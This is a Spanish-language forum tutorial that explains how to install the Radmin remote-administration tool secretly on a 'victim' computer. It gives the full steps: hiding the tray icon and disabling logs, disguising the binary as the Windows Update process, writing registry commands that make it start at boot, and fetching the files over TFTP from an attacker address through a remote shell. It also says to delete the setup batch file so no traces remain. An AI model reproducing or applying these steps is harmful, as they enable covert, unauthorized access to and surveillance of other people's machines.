Autor
Hola lo mas problable es que muchos ya sepan como hacerlo, pero creo que la informacion nunca esta demas, asi que aqui va.
pues bien, radmin es una herramienta de administracion remota que nos permitira tener:
*Escritorio remoto de nuestra victima
*Espiar escritorio
*Subir y bajar archivos
*Shell remota
Yo utilice la versión 2.1 no se si con otras funcione, la web oficial de radmin es www.radmin.com
empecemos ya, voy a poner los pasos enumerados
1.- Nos bajamos el radmin, y lo instalamos en nuestra maquina
2.-Abrimos una shell, para eso nos vamos a inicio---- ejecutar---cmd.exe o cmommand.com segun sea el caso y nos dirigimos al directorio donde instalamos radmin
Citar
c:\archivos de programa\radmin\
y ejecutamos r_server.exe /setup
Citar
c:\archivos de programa\radmin\r_server.exe /setup
nos aparecera una ventana en la que podremos configurarlo a nuestro gusto.
3.-Escojemos la opcion Set password
ahora procedemos a introducir nuestro password, deben ser como minimo 8 caracteres, revisen que no este activada la opcion de Enable NT security y le damos en OK
ahora nos dirigimos a la opcion Options
en port pongan el que quieran, es el puerto que radmin usara para conectarce, de preferencia usen puertos arriba de 1000 para no levantar sospechas
en trai icon palomeen la opcion Hide trai icon, de esa manera cuando el servidor de radmin se ejecute en la maquina victima no se vera ningun icono
en las demas opciones asegurence de que todo esta desactivado, no quremos dejar logs de ningun tipo, ahora le damos en OK y en Exit.
ya tenemos nuestro radmin bien configurado
ahora viene lo buenovoy a explicar dos metodos, uno para instalarlo desde shell remota de usuario y otra para hacer un solo ejecutable que ya tenga nuestro radmin y su configuracion. bueno eso si veo interes en la gente del foro
4.- bamos a ir al registro de windows a la siguiente clave:
HKEY_LOCAL_MACHINE\System\RAdmin\v2.0\Server\Parameters
y vamos a fijarnos en las siguientes entradas:
Port aqui esta el puerto que pusimos solo que en hexadecimal
Parameter esta es la contraseña
DisableTrayIcon es la opcion para ocultar el icono
lo que vamos a hacer es copiar los valores de esas tres entradas, porque ahorita las vamos a usar, en mi caso estos fueron los valores
Port b7060000 yo use el puerto 1719
Parameter 3Ab503515d51eb10c3f98c7ab7bc5993
DisableTrayIcon 01000000 este debe estar asi
5.-Ahora nos dirigimos a la carpeta donde tenemos el radmin y le cambiamos el nombre a r_server.exe por otro menos sospechoso, yo le puse al mio waudt.exe y con la herramienta reshack le cambie el icono, yo le puse el de las actualizaciones automaticas (wuauclt.exe)
6.-Bien ahora vamos a hacer un bat que nos agrege las llaves en el registro y que arranque a radmin con el inicio del sistema.
codigo:
Citar
REG ADD HKEY_LOCAL_MACHINE\System\RAdmin\v2.0\Server\Parameters /v Port /t REG_BINARY /d "b7060000"
REG ADD HKEY_LOCAL_MACHINE\System\RAdmin\v2.0\Server\Parameters /v Parameter /t REG_BINARY /d "3Ab503515d51eb10c3f98c7ab7bc5993"
REG ADD HKEY_LOCAL_MACHINE\System\RAdmin\v2.0\Server\Parameters /v DisableTrayIcon /t REG_BINARY /d "01000000"
REG ADD HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v wuauclt /t REG_SZ /d "C:\windows\system32\wuaudt.exe"
REG ADD HKEY_LOCAL_MACHINE\System\RAdmin\v2.0\Server\Parameters /v Parameter /t REG_BINARY /d "3Ab503515d51eb10c3f98c7ab7bc5993"
REG ADD HKEY_LOCAL_MACHINE\System\RAdmin\v2.0\Server\Parameters /v DisableTrayIcon /t REG_BINARY /d "01000000"
REG ADD HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v wuauclt /t REG_SZ /d "C:\windows\system32\wuaudt.exe"
solo sustituyan los valores por los suyos.
7.-Subir archivos via tftp
una ves que tengamos una shell remota de la victima vamos a subirle a radmin, para eso siguiendo el ejemplo que estoy poniendo seria:
Citar
tftp -i xxx.xxx.xxx.xxx get wuaudt.exe C:\windows\system32\wuaudt.exe
este es el radmin ya debidamente camuflageadoCitar
tftp -i xxx.xxx.xxx.xxx get AdmDll.dll C:\windows\system32\AdmDll.dll
la dll del radmin, no le cambien el nombreCitar
tftp -i xxx.xxx.xxx.xxx get 1025.bat C:\windows\system32\1025.bat
este es el bat que se encarga de agregar los valores en el registro, pueden agregarle un del al final del bat para no dejar rastros (ejem: del 1025.bat)ahora solo basta con ejecutar el bat desde la shell y ya tendremos todo listo para el proximo reinicio, pero como nosotros somos muy impacientes y no podemos aguantar hasta el prox reinicio....
8.- Ejecutar radmin
desde la shell
Citar
wuaudt.exe /pass:mipassword /port:tupuerto
yo le puse a mi radmin wuadt.exe pero tu puedes ponerle como quieras, de esta forma ya puedes entrar con el cliente (radmin.exe) a hacer lo que te plasca sin nececidad de reinicar y la proxima ves que se inicie windows, radmin ya estara listo esperando tu conexion
bien aqui termino este tuto espero que les sirva de algo, a mi me a servido bastante y espero que a ustedes tambien
adios...
Tutorial escrito por: OCTALH
En línea
. Thanks.
